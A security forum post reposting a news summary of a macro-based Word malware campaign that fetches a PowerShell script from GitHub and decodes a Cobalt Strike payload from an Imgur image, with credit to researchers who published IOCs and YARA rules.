silversurfer
Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
- Aug 17, 2014
- 10,154
A new strand of malware uses Word files with macros to download a PowerShell script from GitHub.
This PowerShell script further downloads a legitimate image file from image hosting service Imgur to decode a Cobalt Strike script on Windows systems.
This week researcher Arkbird has shared details on a new macro-based malware that is evasive and spawns payload in multifaceted steps.
The malware strand which looks "like MuddyWater," according to the researcher, ships as an embedded macro within a legacy Microsoft Word (*.doc) file, in the style of the APT group. [...]
Security researcher Florian Roth from Nextron Systems has additionally added the Indicators of Compromise (IOCs) associated with this malware to MuddyWater IOCs list, and provided YARA rules that can be used to detect the variant in your environment.
The IOCs associated with the macro-laden Word documents used in this campaign are given below:
GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic
A new strand of malware uses Word files with macros to download a PowerShell script from GitHub. This PowerShell script further downloads a legitimate image file from image hosting service Imgur to decode a Cobalt Strike script.
www.bleepingcomputer.com